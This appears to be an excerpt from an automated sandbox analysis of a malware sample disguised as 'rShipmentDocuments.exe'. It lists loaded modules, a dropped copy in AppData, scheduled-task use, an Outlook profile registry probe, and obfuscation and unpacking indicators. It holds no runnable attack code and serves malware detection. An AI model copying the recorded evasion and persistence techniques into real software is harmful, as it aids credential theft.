                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: apphelp.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: dwrite.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: textshaping.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: windowscodecs.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: amsi.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: iconcodecservice.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: propsys.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: edputil.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: urlmon.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: iertutil.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: srvcli.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: netutils.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: wintypes.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: appresolver.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: bcp47langs.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: slc.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: sppc.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: rasapi32.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: rasman.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: rtutils.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: winnsi.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: secur32.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: schannel.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: mskeyprotect.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: ncryptsslp.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeSection loaded: dpapi.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: rShipmentDocuments.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: rShipmentDocuments.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, cQp1qcD75pepdx07b2.cs.Net Code: WdEubta7iG System.Reflection.Assembly.Load(byte[])
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, cQp1qcD75pepdx07b2.cs.Net Code: WdEubta7iG System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 0_2_058D3243 pushad ; iretd 0_2_058D3249
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 0_2_058D3F8B pushad ; retn 0582h0_2_058D3F65
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 9_2_068F9233 push es; ret 9_2_068F9244
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 10_2_04CE3248 pushad ; iretd 10_2_04CE3249
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 10_2_069C04E7 push ebp; ret 10_2_069C04E8
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_0303EFDF push ds; retn 0005h16_2_0303EFEA
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_06D89241 push es; ret 16_2_06D89244
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 16_2_06D838AD push eax; retn 0005h16_2_06D838B2
                Source: rShipmentDocuments.exeStatic PE information: section name: .text entropy: 7.843601109745972
                Source: ZOlmYtPdlO.exe.0.drStatic PE information: section name: .text entropy: 7.843601109745972
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, sfMpDDrgl5tIjHCJHi.csHigh entropy of concatenated method names: 'vpGaW2PTN0', 'wegaH4jDyg', 'urWa4qvVbq', 'fCX4PYIhOH', 'q1B4zNkRqf', 'rLVaZC16tS', 'w83a3OIIqq', 'okgaIn8Z3B', 'fkEagww8gU', 'khqaunenWt'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, LGGmv9ymOKi5LCYbxd.csHigh entropy of concatenated method names: 'npHX1AblaZ', 'baqXEkOt7J', 'RuKX7KX4eq', 'iSVX6FFjK2', 'zlbXo0AyVg', 'xk8Xxe5gYw', 'Sv5X2f9F7e', 'PCAXcTpR9F', 'M3RXAoD4rj', 'dLsXJ9p8BR'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, zXKTFwNZqwSqRHqKqL.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'BxBIS2KtjI', 'OZvIPm7kRm', 'aJfIzkbxK0', 'FO2gZ65hKM', 'oFRg3K4U1G', 'yfFgInamSb', 'gR9ggG0bIJ', 'awC6mZHPi1ydDq46Q07'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, cQp1qcD75pepdx07b2.csHigh entropy of concatenated method names: 'Gn3gmISRMx', 'q1DgWRbbnS', 'g3Zg0nnG3v', 'JmvgH6JwhY', 'RYrgQKVfGT', 'RyEg4wbiXp', 'barga0LMAT', 'ShtgFVfD6W', 'Gghg8Ndg2K', 'TuvgCnWjLB'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, rrJmBaYMgAesC46HKX.csHigh entropy of concatenated method names: 'xG3QjGn87h', 'NN6QYWiYKT', 'OKIHxSvTmK', 'AqtH2WSMQw', 'LWaHcxDdlY', 'blWHATvVd3', 'GtQHJ0E0eI', 'FTOH5SR86k', 'rdiHLAdUMj', 'x6DH1Vb3Zt'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, K5wdDCoyqRME3lH5EU.csHigh entropy of concatenated method names: 'jTmbXwA9h', 'Vd0sdqFFt', 'UG5q0NHX8', 'uB1YhlsGh', 'FOlpvT7i5', 'yIfhkRr26', 'Y7fIVyZ8DGQoBgOfCL', 'WYQoZojU6ruWO8Bbng', 'KsNBLPTyw', 'rSaOPD72o'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, WHIuwreRDsPbwviSjC.csHigh entropy of concatenated method names: 'fQg07Wj5vS', 'DJC060ZXno', 'ja20RebG4F', 'l5m09JnrAG', 'CNd0wT3LMj', 'PrE0eIt332', 'stK0MFBRSS', 'hI80DxEbfd', 'IWg0SxrwDy', 'pf00PfKDeV'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, tUWY54atKrJQlDpHvp.csHigh entropy of concatenated method names: 'Dispose', 'KQk3SQMWoP', 'c89IogNuuD', 'rhwllieQpv', 'IkQ3PMBGby', 'pam3zPCspE', 'ProcessDialogKey', 'vjvIZx49D7', 'ctGI37nYx2', 'jNfIIOfYcv'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, XVYEWIFWBiLsTMqJ21.csHigh entropy of concatenated method names: 'nJ7akCNgu4', 'tDnaVDpnE1', 'tuAabZBu5u', 'G7lasRfKEf', 'wZBajVwA4O', 'wgFaqeYGSB', 'gTZaYWxLmp', 'u4taGsm15h', 'PvQapKO6Np', 'L3Uahmvh7C'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, Bw42dh4UebWEaNMXNVH.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VQ8O7dhF48', 'Ib4O6t3FLx', 'imVOR3G4oi', 'tYDO9I8vkI', 'yI3OwPIGJi', 'Re5OendZeS', 'QmNOMxsioE'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, s8ssFsqinUuXVMjTPg.csHigh entropy of concatenated method names: 'lHW3agsf51', 'xxN3F2wPIp', 'XLl3CNyHhj', 'x6y3ytZCnf', 'Oa33XwFddK', 'vgZ3KOev9h', 'QU1cv2vHdMOPcQI0FR', 'RHw0quuw1230eOtEX9', 'G4N33Sb3gu', 'ARC3g7ykgO'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, syuYZq4btbLXi0a2KwI.csHigh entropy of concatenated method names: 'MBvrkZSfdd', 'nlYrVqSUI6', 'Exorb01ktZ', 'kEZrs65423', 'BVerjuu3Vh', 'gWPrqxGr2m', 'Lq4rYPUoN5', 'Y79rGTXibx', 'CNGrp5XXbI', 'isHrh3wD38'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, qsHtpHimvnffligSo0.csHigh entropy of concatenated method names: 'drqfDnTwja', 'FrqfPtuOjs', 'nq5BZadZge', 'EkJB33WMYx', 'LZ9ft19Krn', 'AtJfEJ0BDx', 'P0jfUibrEY', 'nbQf7fOIZa', 'e9xf64RC3h', 'HHvfRuFnMw'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, ajBCZlS1bBb6GaZcdb.csHigh entropy of concatenated method names: 'WaF4maqxIq', 'diS40DLdTd', 'nQU4QsfplF', 'DRm4abQiOR', 'J1a4FEu4HB', 'B45QwAOg80', 'qlbQeb1rY2', 'ou7QMDbksH', 'aZMQD2RIAd', 'vPlQS7PTAP'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, nSJmboJMlQX1MjvRbF.csHigh entropy of concatenated method names: 'PR5TGyjIux', 'RjeTp0rKrp', 'TnTTdw65DD', 'OvIToawqCA', 'uY9T2sKkJi', 'XQVTcFavt3', 'wJyTJxOMul', 'Wf3T59jFta', 'PwWT1jVNbN', 'HLOTtJCjBI'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, n1RHYrzOvkNoCypqxv.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QNDrT23w9l', 'eUvrXhj59N', 'AAxrKi78yI', 'ng3rfXJDDt', 'lplrBHsi0h', 'du2rruGQ1c', 'ARXrO0ByiC'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, ej24U02jMkJFDYhhLB.csHigh entropy of concatenated method names: 'jCpBWVVIgh', 'ei5B0owIh8', 'X24BHCxlVR', 'x7gBQjMYXC', 'EbkB4Oks9w', 'klDBaEsOYg', 'IpRBFdeDva', 'WIcB8GfT3c', 'W0LBCSI4CH', 'MAMByKUJpy'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, yMxGlJ7yHLI4VmhwgP.csHigh entropy of concatenated method names: 'JJkfC9M6r0', 'To1fyO6V6X', 'ToString', 'EH0fWeJ5GH', 'iVmf0NNGpu', 'C21fH5tDeM', 'rtPfQ6lLd4', 'UECf4TNT17', 'vUEfa4ewC9', 'DZRfFb1K4L'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, EsoFSY1MObHNFvQ0yc.csHigh entropy of concatenated method names: 'weNr3ELckE', 'bYwrgh3JNF', 'NT4ruV2OPY', 'E9xrW2m6KQ', 'lcsr0wfgyD', 'UGYrQtCDfg', 'E5fr4SRavu', 'VbhBMmgLqE', 'OUDBDm9bgI', 'ryGBSA4fpR'
